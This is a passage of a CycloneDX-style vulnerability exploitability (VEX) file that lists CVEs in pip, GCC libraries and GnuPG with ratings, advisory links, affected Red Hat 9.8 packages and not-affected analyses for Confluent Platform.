      "id": "CVE-2021-3572",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.7,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.5,
          "severity": "info",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        20
      ],
      "description": "A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-3572"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2021:3254"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-3572"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1772014"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928707"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928904"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1935913"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1941534"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1955615"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1957458"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1962856"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1968074"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18874"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27619"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28493"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20095"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28957"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29921"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3426"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3572"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42771"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2021:4162"
        },
        {
          "url": "https://github.com/advisories/GHSA-5xp3-jfq3-5q8x"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2021-437.yaml"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b"
        },
        {
          "url": "https://github.com/pypa/pip/issues/10042"
        },
        {
          "url": "https://github.com/pypa/pip/issues/10042#issuecomment-857452480"
        },
        {
          "url": "https://github.com/pypa/pip/pull/9827"
        },
        {
          "url": "https://github.com/skazi0/CVE-2021-3572/blob/master/CVE-2021-3572-v9.0.1.patch"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2021-3572.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-12349.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3572"
        },
        {
          "url": "https://packetstormsecurity.com/files/162712/USN-4961-1.txt"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240621-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4961-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-3572"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
        }
      ],
      "published": "2021-11-10T18:15:09+00:00",
      "updated": "2026-06-17T04:05:21+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2021-46195",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        674
      ],
      "description": "GCC v12.0 was discovered to contain an uncontrolled recursion via the component libiberty/rust-demangle.c. This vulnerability allows attackers to cause a Denial of Service (DoS) by consuming excessive CPU and memory resources.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-46195"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2022:8415"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-46195"
        },
        {
          "url": "https://bugzilla.redhat.com/2046300"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2022-8415.html"
        },
        {
          "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=103841"
        },
        {
          "url": "https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=f10bec5ffa487ad3033ed5f38cfd0fc7d696deab"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2021-46195.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2022-8415.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46195"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-46195"
        }
      ],
      "published": "2022-01-14T20:15:15+00:00",
      "updated": "2026-06-17T04:14:38+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-27943",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        674
      ],
      "description": "libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-27943"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-27943"
        },
        {
          "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead"
        },
        {
          "url": "https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27943"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28995"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-27943"
        }
      ],
      "published": "2022-03-26T13:15:07+00:00",
      "updated": "2026-06-17T04:37:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-3219",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-3219"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-3219"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010"
        },
        {
          "url": "https://dev.gnupg.org/D556"
        },
        {
          "url": "https://dev.gnupg.org/T5993"
        },
        {
          "url": "https://marc.info/?l=oss-security&m=165696590211434&w=4"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230324-0001/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-3219"
        }
      ],
      "published": "2023-02-23T20:15:12+00:00",
      "updated": "2026-06-17T04:59:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
